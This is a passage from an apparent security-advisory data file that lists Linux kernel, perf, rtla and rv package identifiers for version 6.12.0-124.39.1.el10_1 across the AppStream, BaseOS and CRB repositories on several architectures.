"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
